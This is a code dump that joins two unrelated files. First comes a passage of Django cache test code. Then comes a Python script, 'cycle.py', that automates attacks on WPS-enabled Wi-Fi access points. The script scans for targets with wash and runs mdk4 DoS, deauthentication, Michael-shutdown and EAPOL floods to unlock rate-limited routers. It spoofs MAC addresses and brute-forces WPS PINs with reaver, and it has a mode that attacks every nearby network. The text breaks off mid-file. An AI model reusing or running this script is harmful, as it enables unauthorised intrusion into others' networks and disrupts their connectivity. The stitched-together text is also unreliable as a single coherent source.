response) # Verify that the querystring is taken into account. self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.' 'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e' ) def test_cache_key_varies_by_url(self): """ get_cache_key keys differ by fully-qualfied URL instead of path """ request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com') learn_cache_key(request1, HttpResponse()) request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com') learn_cache_key(request2, HttpResponse()) self.assertTrue(get_cache_key(request1) != get_cache_key(request2)) def test_learn_cache_key(self): request = self.factory.head(self.path) response = HttpResponse() response['Vary'] = 'Pony' # Make sure that the Vary header is added to the key hash learn_cache_key(request, response) self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.' '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e' ) def test_patch_cache_control(self): tests = ( # Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts (None, {'private': True}, set(['private'])), # Test whether private/public attributes are mutually exclusive ('private', {'private': True}, set(['private'])), ('private', {'public': True}, set(['public'])), ('public', {'public': True}, set(['public'])), ('public', {'private': True}, set(['private'])), ('must-revalidate,max-age=60,private', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])), ('must-revalidate,max-age=60,public', {'private': True}, set(['must-revalidate', 'max-age=60', 'private'])), ('must-revalidate,max-age=60', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])), ) cc_delim_re = re.compile(r'\s*,\s*') for initial_cc, newheaders, expected_cc in tests: response = HttpResponse() if initial_cc is not None: response['Cache-Control'] = initial_cc patch_cache_control(response, **newheaders) parts = set(cc_delim_re.split(response['Cache-Control'])) self.assertEqual(parts, expected_cc) @override_settings( CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'KEY_PREFIX': 'cacheprefix', }, }, ) class PrefixedCacheUtils(CacheUtils): pass @override_settings( CACHE_MIDDLEWARE_SECONDS=60, CACHE_MIDDLEWARE_KEY_PREFIX='test', CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', }, }, ) class CacheHEADTest(TestCase): def setUp(self): self.path = '/cache/test/' self.factory = RequestFactory() def tearDown(self): cache.clear() def _set_cache(self, request, msg): response = HttpResponse() response.content = msg return UpdateCacheMiddleware().process_response(request, response) def test_head_caches_correctly(self): test_content = 'test content' request = self.factory.head(self.path) request._cache_update_cache = True self._set_cache(request, test_content) request = self.factory.head(self.path) request._cache_update_cache = True get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertNotEqual(get_cache_data, None) self.assertEqual(test_content.encode(), get_cache_data.content) def test_head_with_cached_get(self): test_content = 'test content' request = self.factory.get(self.path) request._cache_update_cache = True self._set_cache(request, test_content) request = self.factory.head(self.path) get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertNotEqual(get_cache_data, None) self.assertEqual(test_content.encode(), get_cache_data.content) @override_settings( CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix', CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', }, }, LANGUAGES=( ('en', 'English'), ('es', 'Spanish'), ), ) class CacheI18nTest(TestCase): def setUp(self): self.path = '/cache/test/' self.factory = RequestFactory() def tearDown(self): cache.clear() @override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False) def test_cache_key_i18n_translation(self): request = self.factory.get(self.path) lang = translation.get_language() response = HttpResponse() key = learn_cache_key(request, response) self.assertIn(lang, key, "Cache keys should include the language name when translation is active") key2 = get_cache_key(request) self.assertEqual(key, key2) def check_accept_language_vary(self, accept_language, vary, reference_key): request = self.factory.get(self.path) request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0' response = HttpResponse() response['Vary'] = vary key = learn_cache_key(request, response) key2 = get_cache_key(request) self.assertEqual(key, reference_key) self.assertEqual(key2, reference_key) @override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False) def test_cache_key_i18n_translation_accept_language(self): lang = translation.get_language() self.assertEqual(lang, 'en') request = self.factory.get(self.path) request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0' response = HttpResponse() response['Vary'] = 'accept-encoding' key = learn_cache_key(request, response) self.assertIn(lang, key, "Cache keys should include the language name when translation is active") self.check_accept_language_vary( 'en-us', 'cookie, accept-language, accept-encoding', key ) self.check_accept_language_vary( 'en-US', 'cookie, accept-encoding, accept-language', key ) self.check_accept_language_vary( 'en-US,en;q=0.8', 'accept-encoding, accept-language, cookie', key ) self.check_accept_language_vary( 'en-US,en;q=0.8,ko;q=0.6', 'accept-language, cookie, accept-encoding', key ) self.check_accept_language_vary( 'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ', 'accept-encoding, cookie, accept-language', key ) self.check_accept_language_vary( 'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4', 'accept-language, accept-encoding, cookie', key ) self.check_accept_language_vary( 'ko;q=1.0,en;q=0.5', 'cookie, accept-language, accept-encoding', key ) self.check_accept_language_vary( 'ko, en', 'cookie, accept-encoding, accept-language', key ) self.check_accept_language_vary( 'ko-KR, en-US', 'accept-encoding, accept-language, cookie', key ) @override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False) def test_cache_key_i18n_formatting(self): request = self.factory.get(self.path) lang = translation.get_language() response = HttpResponse() key = learn_cache_key(request, response) self.assertIn(lang, key, "Cache keys should include the language name when formatting is active") key2 = get_cache_key(request) self.assertEqual(key, key2) @override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True) def test_cache_key_i18n_timezone(self): request = self.factory.get(self.path) # This is tightly coupled to the implementation, # but it's the most straightforward way to test the key. tz = force_text(timezone.get_current_timezone_name(), errors='ignore') tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_') response = HttpResponse() key = learn_cache_key(request, response) self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active") key2 = get_cache_key(request) self.assertEqual(key, key2) @override_settings(USE_I18N=False, USE_L10N=False) def test_cache_key_no_i18n(self): request = self.factory.get(self.path) lang = translation.get_language() tz = force_text(timezone.get_current_timezone_name(), errors='ignore') tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_') response = HttpResponse() key = learn_cache_key(request, response) self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active") self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active") @override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True) def test_cache_key_with_non_ascii_tzname(self): # Regression test for #17476 class CustomTzName(timezone.UTC): name = '' def tzname(self, dt): return self.name request = self.factory.get(self.path) response = HttpResponse() with timezone.override(CustomTzName()): CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string sanitized_name = 'Hora_estndar_de_Argentina' self.assertIn(sanitized_name, learn_cache_key(request, response), "Cache keys should include the time zone name when time zones are active") CustomTzName.name = 'Hora estándar de Argentina' # unicode sanitized_name = 'Hora_estndar_de_Argentina' self.assertIn(sanitized_name, learn_cache_key(request, response), "Cache keys should include the time zone name when time zones are active") @override_settings( CACHE_MIDDLEWARE_KEY_PREFIX="test", CACHE_MIDDLEWARE_SECONDS=60, USE_ETAGS=True, USE_I18N=True, ) def test_middleware(self): def set_cache(request, lang, msg): translation.activate(lang) response = HttpResponse() response.content = msg return UpdateCacheMiddleware().process_response(request, response) # cache with non empty request.GET request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'}) request._cache_update_cache = True get_cache_data = FetchFromCacheMiddleware().process_request(request) # first access, cache must return None self.assertEqual(get_cache_data, None) response = HttpResponse() content = 'Check for cache with QUERY_STRING' response.content = content UpdateCacheMiddleware().process_response(request, response) get_cache_data = FetchFromCacheMiddleware().process_request(request) # cache must return content self.assertNotEqual(get_cache_data, None) self.assertEqual(get_cache_data.content, content.encode()) # different QUERY_STRING, cache must be empty request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'}) request._cache_update_cache = True get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertEqual(get_cache_data, None) # i18n tests en_message = "Hello world!" es_message = "Hola mundo!" request = self.factory.get(self.path) request._cache_update_cache = True set_cache(request, 'en', en_message) get_cache_data = FetchFromCacheMiddleware().process_request(request) # Check that we can recover the cache self.assertNotEqual(get_cache_data, None) self.assertEqual(get_cache_data.content, en_message.encode()) # Check that we use etags self.assertTrue(get_cache_data.has_header('ETag')) # Check that we can disable etags with self.settings(USE_ETAGS=False): request._cache_update_cache = True set_cache(request, 'en', en_message) get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertFalse(get_cache_data.has_header('ETag')) # change the session language and set content request = self.factory.get(self.path) request._cache_update_cache = True set_cache(request, 'es', es_message) # change again the language translation.activate('en') # retrieve the content from cache get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertEqual(get_cache_data.content, en_message.encode()) # change again the language translation.activate('es') get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertEqual(get_cache_data.content, es_message.encode()) # reset the language translation.deactivate() @override_settings( CACHE_MIDDLEWARE_KEY_PREFIX="test", CACHE_MIDDLEWARE_SECONDS=60, USE_ETAGS=True, ) def test_middleware_doesnt_cache_streaming_response(self): request = self.factory.get(self.path) get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertIsNone(get_cache_data) # This test passes on Python < 3.3 even without the corresponding code # in UpdateCacheMiddleware, because pickling a StreamingHttpResponse # fails (http://bugs.python.org/issue14288). LocMemCache silently # swallows the exception and doesn't store the response in cache. content = ['Check for cache with streaming content.'] response = StreamingHttpResponse(content) UpdateCacheMiddleware().process_response(request, response) get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertIsNone(get_cache_data) @override_settings( CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'KEY_PREFIX': 'cacheprefix' }, }, ) class PrefixedCacheI18nTest(CacheI18nTest): pass def hello_world_view(request, value): return HttpResponse('Hello World %s' % value) @override_settings( CACHE_MIDDLEWARE_ALIAS='other', CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix', CACHE_MIDDLEWARE_SECONDS=30, CACHE_MIDDLEWARE_ANONYMOUS_ONLY=False, CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', }, 'other': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'LOCATION': 'other', 'TIMEOUT': '1', }, }, ) class CacheMiddlewareTest(IgnoreDeprecationWarningsMixin, TestCase): def setUp(self): super(CacheMiddlewareTest, self).setUp() self.factory = RequestFactory() self.default_cache = caches['default'] self.other_cache = caches['other'] def tearDown(self): self.default_cache.clear() self.other_cache.clear() super(CacheMiddlewareTest, self).tearDown() def test_constructor(self): """ Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as Middleware vs. usage of CacheMiddleware as view decorator and setting attributes appropriately. """ # If no arguments are passed in construction, it's being used as middleware. middleware = CacheMiddleware() # Now test object attributes against values defined in setUp above self.assertEqual(middleware.cache_timeout, 30) self.assertEqual(middleware.key_prefix, 'middlewareprefix') self.assertEqual(middleware.cache_alias, 'other') self.assertEqual(middleware.cache_anonymous_only, False) # If arguments are being passed in construction, it's being used as a decorator. # First, test with "defaults": as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None) self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30 self.assertEqual(as_view_decorator.key_prefix, '') self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache self.assertEqual(as_view_decorator.cache_anonymous_only, False) # Next, test with custom values: as_view_decorator_with_custom = CacheMiddleware(cache_anonymous_only=True, cache_timeout=60, cache_alias='other', key_prefix='foo') self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60) self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo') self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other') self.assertEqual(as_view_decorator_with_custom.cache_anonymous_only, True) def test_middleware(self): middleware = CacheMiddleware() prefix_middleware = CacheMiddleware(key_prefix='prefix1') timeout_middleware = CacheMiddleware(cache_timeout=1) request = self.factory.get('/view/') # Put the request through the request middleware result = middleware.process_request(request) self.assertEqual(result, None) response = hello_world_view(request, '1') # Now put the response through the response middleware response = middleware.process_response(request, response) # Repeating the request should result in a cache hit result = middleware.process_request(request) self.assertNotEqual(result, None) self.assertEqual(result.content, b'Hello World 1') # The same request through a different middleware won't hit result = prefix_middleware.process_request(request) self.assertEqual(result, None) # The same request with a timeout _will_ hit result = timeout_middleware.process_request(request) self.assertNotEqual(result, None) self.assertEqual(result.content, b'Hello World 1') @override_settings(CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True) def test_cache_middleware_anonymous_only_wont_cause_session_access(self): """ The cache middleware shouldn't cause a session access due to CACHE_MIDDLEWARE_ANONYMOUS_ONLY if nothing else has accessed the session. Refs 13283 """ from django.contrib.sessions.middleware import SessionMiddleware from django.contrib.auth.middleware import AuthenticationMiddleware middleware = CacheMiddleware() session_middleware = SessionMiddleware() auth_middleware = AuthenticationMiddleware() request = self.factory.get('/view_anon/') # Put the request through the request middleware session_middleware.process_request(request) auth_middleware.process_request(request) result = middleware.process_request(request) self.assertEqual(result, None) response = hello_world_view(request, '1') # Now put the response through the response middleware session_middleware.process_response(request, response) response = middleware.process_response(request, response) self.assertEqual(request.session.accessed, False) @override_settings(CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True) def test_cache_middleware_anonymous_only_with_cache_page(self): """CACHE_MIDDLEWARE_ANONYMOUS_ONLY should still be effective when used with the cache_page decorator: the response to a request from an authenticated user should not be cached.""" request = self.factory.get('/view_anon/') class MockAuthenticatedUser(object): def is_authenticated(self): return True class MockAccessedSession(object): accessed = True request.user = MockAuthenticatedUser() request.session = MockAccessedSession() response = cache_page(60)(hello_world_view)(request, '1') self.assertFalse("Cache-Control" in response) def test_view_decorator(self): # decorate the same view with different cache decorators default_view = cache_page(3)(hello_world_view) default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view) explicit_default_view = cache_page(3, cache='default')(hello_world_view) explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view) other_view = cache_page(1, cache='other')(hello_world_view) other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view) request = self.factory.get('/view/') # Request the view once response = default_view(request, '1') self.assertEqual(response.content, b'Hello World 1') # Request again -- hit the cache response = default_view(request, '2') self.assertEqual(response.content, b'Hello World 1') # Requesting the same view with the explicit cache should yield the same result response = explicit_default_view(request, '3') self.assertEqual(response.content, b'Hello World 1') # Requesting with a prefix will hit a different cache key response = explicit_default_with_prefix_view(request, '4') self.assertEqual(response.content, b'Hello World 4') # Hitting the same view again gives a cache hit response = explicit_default_with_prefix_view(request, '5') self.assertEqual(response.content, b'Hello World 4') # And going back to the implicit cache will hit the same cache response = default_with_prefix_view(request, '6') self.assertEqual(response.content, b'Hello World 4') # Requesting from an alternate cache won't hit cache response = other_view(request, '7') self.assertEqual(response.content, b'Hello World 7') # But a repeated hit will hit cache response = other_view(request, '8') self.assertEqual(response.content, b'Hello World 7') # And prefixing the alternate cache yields yet another cache entry response = other_with_prefix_view(request, '9') self.assertEqual(response.content, b'Hello World 9') # But if we wait a couple of seconds... time.sleep(2) # ... the default cache will still hit caches['default'] response = default_view(request, '11') self.assertEqual(response.content, b'Hello World 1') # ... the default cache with a prefix will still hit response = default_with_prefix_view(request, '12') self.assertEqual(response.content, b'Hello World 4') # ... the explicit default cache will still hit response = explicit_default_view(request, '13') self.assertEqual(response.content, b'Hello World 1') # ... the explicit default cache with a prefix will still hit response = explicit_default_with_prefix_view(request, '14') self.assertEqual(response.content, b'Hello World 4') # .. but a rapidly expiring cache won't hit response = other_view(request, '15') self.assertEqual(response.content, b'Hello World 15') # .. even if it has a prefix response = other_with_prefix_view(request, '16') self.assertEqual(response.content, b'Hello World 16') @override_settings( CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix', CACHE_MIDDLEWARE_SECONDS=1, CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', }, }, USE_I18N=False, ) class TestWithTemplateResponse(TestCase): """ Tests various headers w/ TemplateResponse. Most are probably redundant since they manipulate the same object anyway but the Etag header is 'special' because it relies on the content being complete (which is not necessarily always the case with a TemplateResponse) """ def setUp(self): self.path = '/cache/test/' self.factory = RequestFactory() def tearDown(self): cache.clear() def test_patch_vary_headers(self): headers = ( # Initial vary, new headers, resulting vary. (None, ('Accept-Encoding',), 'Accept-Encoding'), ('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'), ('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'), ('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'), ('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'), ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), (None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'), ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), ('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), ) for initial_vary, newheaders, resulting_vary in headers: response = TemplateResponse(HttpResponse(), Template("This is a test")) if initial_vary is not None: response['Vary'] = initial_vary patch_vary_headers(response, newheaders) self.assertEqual(response['Vary'], resulting_vary) def test_get_cache_key(self): request = self.factory.get(self.path) response = TemplateResponse(HttpResponse(), Template("This is a test")) key_prefix = 'localprefix' # Expect None if no headers have been set yet. self.assertEqual(get_cache_key(request), None) # Set headers to an empty list. learn_cache_key(request, response) self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.' '58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e' ) # Verify that a specified key_prefix is taken into account. learn_cache_key(request, response, key_prefix=key_prefix) self.assertEqual( get_cache_key(request, key_prefix=key_prefix), 'views.decorators.cache.cache_page.localprefix.GET.' '58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e' ) def test_get_cache_key_with_query(self): request = self.factory.get(self.path, {'test': 1}) response = TemplateResponse(HttpResponse(), Template("This is a test")) # Expect None if no headers have been set yet. self.assertEqual(get_cache_key(request), None) # Set headers to an empty list. learn_cache_key(request, response) # Verify that the querystring is taken into account. self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.' '0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e' ) @override_settings(USE_ETAGS=False) def test_without_etag(self): response = TemplateResponse(HttpResponse(), Template("This is a test")) self.assertFalse(response.has_header('ETag')) patch_response_headers(response) self.assertFalse(response.has_header('ETag')) response = response.render() self.assertFalse(response.has_header('ETag')) @override_settings(USE_ETAGS=True) def test_with_etag(self): response = TemplateResponse(HttpResponse(), Template("This is a test")) self.assertFalse(response.has_header('ETag')) patch_response_headers(response) self.assertFalse(response.has_header('ETag')) response = response.render() self.assertTrue(response.has_header('ETag')) class TestEtagWithAdmin(TestCase): # See https://code.djangoproject.com/ticket/16003 urls = "admin_views.urls" def test_admin(self): with self.settings(USE_ETAGS=False): response = self.client.get('/test_admin/admin/') self.assertEqual(response.status_code, 302) self.assertFalse(response.has_header('ETag')) with self.settings(USE_ETAGS=True): response = self.client.get('/test_admin/admin/') self.assertEqual(response.status_code, 302) self.assertTrue(response.has_header('ETag')) class TestMakeTemplateFragmentKey(TestCase): def test_without_vary_on(self): key = make_template_fragment_key('a.fragment') self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e') def test_with_one_vary_on(self): key = make_template_fragment_key('foo', ['abc']) self.assertEqual(key, 'template.cache.foo.900150983cd24fb0d6963f7d28e17f72') def test_with_many_vary_on(self): key = make_template_fragment_key('bar', ['abc', 'def']) self.assertEqual(key, 'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88') def test_proper_escaping(self): key = make_template_fragment_key('spam', ['abc:def%']) self.assertEqual(key, 'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469') class CacheHandlerTest(TestCase): def test_same_instance(self): """ Attempting to retrieve the same alias should yield the same instance. """ cache1 = caches['default'] cache2 = caches['default'] self.assertTrue(cache1 is cache2) def test_per_thread(self): """ Requesting the same alias from separate threads should yield separate instances. """ c = [] def runner(): c.append(caches['default']) for x in range(2): t = threading.Thread(target=runner) t.start() t.join() self.assertFalse(c[0] is c[1])
cycle.py
import datetime import re import subprocess import sys import threading import time from argparse import ArgumentParser from shutil import which import pexpect import psutil as psutil from art import text2art from loguru import logger from dateutils import pretty_time_delta wash_regex = r'^((?:[A-Z0-9]{2}:){5}[A-Z0-9]{2})\s+(\d{1,2})\s+(-?\d{1,2})\s+(1\.0|2\.0)\s+(Yes|No)\s+(\w+)?\s+(.*)' blacklist_filename = 'blacklist.txt' rate_limiting_msg = 'WARNING: Detected AP rate limiting' ON_POSIX = 'posix' in sys.builtin_module_names num_dos_attacks = 0 def run_wash(channel, interface): wash_args = ['wash', '-i', interface] if channel: wash_args.extend(['-c', str(channel)]) return subprocess.Popen(wash_args, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) def run_reaver(interface, no_nacks, channel, bssid, small): reaver_args = ['reaver', '-i', interface, '-b', bssid, '-vv'] if no_nacks: reaver_args.append('-N') if small: reaver_args.append('-S') if channel: reaver_args.extend(['-c', str(channel)]) return subprocess.Popen(reaver_args, stdout=subprocess.PIPE, bufsize=1, universal_newlines=True) def run_mdk4_deauth(bssid, interface, channel): logger.debug('Starting deauth') mdk4_args = ['mdk4', interface, 'd', '-b', blacklist_filename] with open(blacklist_filename, 'w') as f: f.write(bssid) if channel: mdk4_args.extend(['-c', str(channel)]) return subprocess.Popen(mdk4_args, stdout=subprocess.PIPE) def run_mdk4_dos(bssid, interface): logger.debug('Starting DoS') mdk4_args = ['stdbuf', '-oL', '-eL', 'mdk4', interface, 'a', '-m', '-i', bssid] return subprocess.Popen(mdk4_args, stdout=subprocess.PIPE, bufsize=1, close_fds=ON_POSIX) def run_mdk4_michael_shutdown(bssid, interface): logger.debug('Starting Michael') mdk4_args = ['mdk4', interface, 'm', '-t', bssid] return subprocess.Popen(mdk4_args, stdout=subprocess.PIPE) def run_mdk4_eapol_start(bssid, interface): logger.debug('Starting EAPOL') mdk4_args = ['mdk4', interface, 'e', '-t', bssid] return subprocess.Popen(mdk4_args, stdout=subprocess.PIPE) def get_wash_output(x): search = re.search(wash_regex, x.decode('utf-8')) return {'bssid': (search.group(1)), 'channel': (search.group(2)), 'strength': (search.group(3)), 'wps_version': (search.group(4)), 'locked': (search.group(5) == 'Yes'), 'vendor': (search.group(6)), 'essid': (search.group(7))} def extract_mass_wash_networks(wash_scanned): return sorted(filter(lambda y: -int(y['strength']) > 10, wash_scanned), key=lambda x: (x['locked'], -int(x['strength']))) def run_cycle(bssid, wait_time, channel, wash_time, interface, no_nacks, small, mac_info, attacks): print(text2art('Cycle')) # print(wikiquote.quote_of_the_day()) # TODO: Think of a performant way to include something clever logger.info('Scanning like a boss') wash_scanned = handle_wash(channel, interface, wash_time) logger.debug(wash_scanned) if bssid: found_network = extract_wash_network(bssid, wash_scanned) if not found_network: logger.error(f'BSSID "{bssid}" not found') return attack_one(found_network, interface, no_nacks, small, wait_time, wash_time, mac_info, attacks) else: mass_attack_networks = extract_mass_wash_networks(wash_scanned) logger.info(f'Running Massive Attack ;) on {len(mass_attack_networks)} networks') for n in mass_attack_networks: attack_one(n, interface, no_nacks, small, wait_time, wash_time, mac_info, attacks) def store_dos_attack_count(p_dos): global num_dos_attacks for line in iter(p_dos.stdout.readline, b''): decoded_line = line.decode() for splitline in map(lambda x: x.strip(), decoded_line.splitlines()): if splitline: logger.trace(splitline) match = re.search(r'Packets sent:\s+(\d+)', decoded_line) if match: num_dos_attacks = int(match.group(1)) def attack_one(found_network, interface, no_nacks, small, wait_time, wash_time, mac_info, attacks): global num_dos_attacks num_dos_attacks = 0 spoof_mac, mac_address = mac_info if spoof_mac and mac_address: new_mac = change_mac(interface, mac_address) if new_mac: logger.info(f'Using custom MAC: {new_mac}') else: return bssid = found_network['bssid'] channel = found_network['channel'] attack_dos = attacks['dos'] attack_deauth = attacks['deauth'] attack_michael = attacks['michael'] attack_eapol = attacks['eapol'] logger.info(f'Attacking {found_network["essid"]} ({found_network["bssid"]})') is_locked = False latest_network = None while True: if spoof_mac and not mac_address: new_mac = change_mac(interface) if new_mac: logger.info(f'Fresh, shiny MAC: {new_mac}') else: return else: new_mac = None if is_locked and not latest_network: # first iteration has already run and waited for network to reappear - check again logger.info('Scanning again') wash_scanned = handle_wash(channel, interface, wash_time) latest_network = extract_wash_network(bssid, wash_scanned) is_locked = latest_network['locked'] if is_locked: # possibly the first iteration - are we still locked? logger.warning('Our friend is locked - attack tools to the rescue!') last_num_dos_attacks = 0 p_dos = None t_dos = None if attack_dos: p_dos = run_mdk4_dos(bssid, interface) t_dos = threading.Thread(target=store_dos_attack_count, args=(p_dos,)) t_dos.daemon = True t_dos.start() p_deauth = run_mdk4_deauth(bssid, interface, channel) if attack_deauth else None p_michael = run_mdk4_michael_shutdown(bssid, interface) if attack_michael else None p_eapol = run_mdk4_eapol_start(bssid, interface) if attack_eapol else None attack_start_time = datetime.datetime.now() last_num_dos_check = datetime.datetime.now() while True: time.sleep(wait_time) wash_scanned = handle_wash(channel, interface, wash_time) latest_network = extract_wash_network(bssid, wash_scanned) is_locked = latest_network and latest_network['locked'] if not latest_network: logger.warning(f'Network {bssid} not found') break if not is_locked: logger.success('Unlocked. Magic. Let\'s ride.') break attack_elapsed = datetime.datetime.now() - attack_start_time attacks_per_sec = (num_dos_attacks - last_num_dos_attacks) // ( datetime.datetime.now() - last_num_dos_check).total_seconds() avg_cpu = int(psutil.getloadavg()[0] * 100 // psutil.cpu_count()) dos_log_line = f' ({format(num_dos_attacks, ",")} DoS attacks) ({format(attacks_per_sec, ",")} a/s)' if attack_dos else '' locked_log_line = f'Still locked ({pretty_time_delta(attack_elapsed.total_seconds())}) ({avg_cpu}% CPU){dos_log_line}' logger.warning(locked_log_line) last_num_dos_attacks = num_dos_attacks last_num_dos_check = datetime.datetime.now() logger.info('Stopping attack tools') if attack_dos and p_dos and p_dos.poll() is None: logger.debug('Killing DoS') p_dos.kill() t_dos.join() for should_attack, popen, name in zip((attack_deauth, attack_michael, attack_eapol), (p_deauth, p_michael, p_eapol), ('deauth', 'Michael', 'EAPOL')): if should_attack and popen and popen.poll() is None: logger.debug(f'Killing {name}') popen.kill() if is_locked: dead_wait_time = 30 logger.info(f'Network appears dead - waiting {dead_wait_time}s') continue reaver_result = handle_reaver(bssid, channel, interface, no_nacks, small, new_mac) if reaver_result: print(text2art('YES!', font='block', chr_ignore=True)) logger.success('Title of your sex tape.') return True else: is_locked = True def change_mac(interface, address=None): ifdown_args = ['ifconfig', interface, 'down'] completed_ifdown = subprocess.run(ifdown_args) if completed_ifdown.returncode: logger.error('Failed to bring {interface} down during MAC change') return False mac_changer_args = ['macchanger'] if address: mac_changer_args.extend(['-m', address]) else: mac_changer_args.append('r') mac_changer_args.append(interface) completed_mac_changer = subprocess.run(mac_changer_args, encoding='utf-8', stdout=subprocess.PIPE) macchanger_text = completed_mac_changer.stdout logger.debug('macchanger reported: {}', macchanger_text) new_mac = re.search(r'New MAC: \s+([a-z0-9:]{17})', macchanger_text).group(1).upper() if macchanger_text else None if completed_mac_changer.returncode and not new_mac: logger.error(f'Failed to change MAC - attempting to bring {interface} back up') if not new_mac: logger.error(f'Failed to read new MAC - attempting to bring {interface} back up') ifup_args = ['ifconfig', interface, 'up'] completed_ifup = subprocess.run(ifup_args) if completed_ifup.returncode: logger.error('Failed to bring {interface} up during MAC change') return False return new_mac def handle_reaver(bssid, channel, interface, no_nacks, small, new_mac): logger.info('Starting Reaver...') reaver_args = ['reaver', '-i', interface, '-b', bssid, '-vv'] if new_mac: reaver_args.extend(['-m', new_mac]) if no_nacks: reaver_args.append('-N') if small: reaver_args.append('-S') if channel: reaver_args.extend(['-c', str(channel)]) c_reaver = pexpect.spawn(' '.join(reaver_args), encoding='utf-8', ignore_sighup=False) c_reaver.logfile = sys.stdout try: c_reaver.expect('Restore previous session.*', timeout=5) c_reaver.sendline('Y') c_reaver.expect('Restored previous session', timeout=5) except pexpect.TIMEOUT: pass if c_reaver.expect(['Pin cracked', 'Detected AP rate limiting'], timeout=None): # only returns false if idx >= 1 c_reaver.sendcontrol('c') c_reaver.expect('Session saved') return False logger.success('Reaver finished without complaining. Optimistically quitting.') return True def extract_wash_network(bssid, wash_scanned): return next((w for w in wash_scanned if w['bssid'] == bssid), None) def handle_wash(channel, interface, wash_time): p_wash = run_wash(channel, interface) time.sleep(wash_time) p_wash.kill() wash_output = p_wash.stdout.readlines()[2:] wash_scanned = list(map(get_wash_output, wash_output)) return wash_scanned def process_args(): parser = ArgumentParser() parser.add_argument('-b', '--bssid', type=str, help='BSSID of target network') parser.add_argument('-w', '--wait-time', type=int, default=60, help='time (secs) to wait between lock checks when attacking') parser.add_argument('-c', '--channel', type=int, help='channel of target BSSID(s)') parser.add_argument('-N', '--send-nacks', action='store_true', help='send NACKs - disabled by default to speed up some attacks') parser.add_argument('-S', '--small', action='store_true', help='enables small subgroup confinement attack on Diffie-Hellman') parser.add_argument('-i', '--interface', type=str, 